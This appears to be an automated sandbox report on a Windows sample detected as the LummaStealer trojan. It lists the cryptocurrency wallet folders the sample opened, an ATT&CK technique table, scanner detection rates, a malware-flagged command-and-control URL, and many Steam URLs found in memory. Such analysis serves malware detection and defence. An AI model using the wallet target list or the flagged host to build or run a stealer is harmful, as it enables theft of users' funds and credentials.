            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
            Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
            Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
            Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GAOBCVIQIJ
            Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BNAGMGSPLO
            Source: Yara match File source: 00000000.00000003.1136637956.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: file.exe PID: 6392, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match File source: Process Memory Space: file.exe PID: 6392, type: MEMORYSTR
            Source: Yara match File source: 0.2.file.exe.220000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

            | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
            |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
            | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 44 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 851 Security Software Discovery | Remote Services | 41 Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
            | Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 44 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
            | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
            | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
            | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 223 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |

            | Source | Detection | Scanner | Label | Link |
            |---|---|---|---|---|
            | file.exe | 64% | Virustotal | | Browse |
            | file.exe | 61% | ReversingLabs | Win32.Trojan.LummaStealer | |
            | file.exe | 100% | Avira | TR/Crypt.TPM.Gen | |

            No Antivirus matches
                                                    high
                                                    https://steamcommunity.com/profiles/76561199822375128/inventory/file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=whw8EcafG167&ampfile.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.valvesoftware.com/legal.htmfile.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&afile.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.youtube.comfile.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.google.comfile.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2Sfile.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196614765.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=englfile.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193503319.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196473496.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187422565.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164445689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103118777.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005433000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.1132235158.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071204186.00000000053F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&amp;l=efile.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193503319.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196473496.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187422565.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196614765.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://s.ytimg.com;file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_co?file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDfile.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.1008156630.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://steam.tv/file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://begindecafer.world:443/QwdZdffile.exe, 00000000.00000003.919517641.0000000000A74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=V4P4q3q732file.exe, 00000000.00000003.1137069557.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103118777.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193193906.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187388354.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1194643055.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187351626.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 
00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&amp;file.exe, 00000000.00000003.1193213379.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132615784.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132251294.0000000005436000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.0000000005439000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193503319.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196473496.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1074783369.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1192568093.0000000005435000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164151481.000000000543C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.1164151481.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187422565.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193213379.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.cloudflare.steamstatic.com/public/javascript/applications/community/Ffile.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164445689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, 
file.exe, 00000000.00000003.1071204186.00000000053F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://steamcommunity.com/jfile.exe, 00000000.00000003.1164445689.0000000000B04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1073638787.00000000054ED000.00000004.00000800.00020000.00000000.sdmpfalse
00000000.00000003.1187351626.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164445689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1196455579.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919517641.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 
00000000.00000003.1102918112.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071204186.00000000053F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
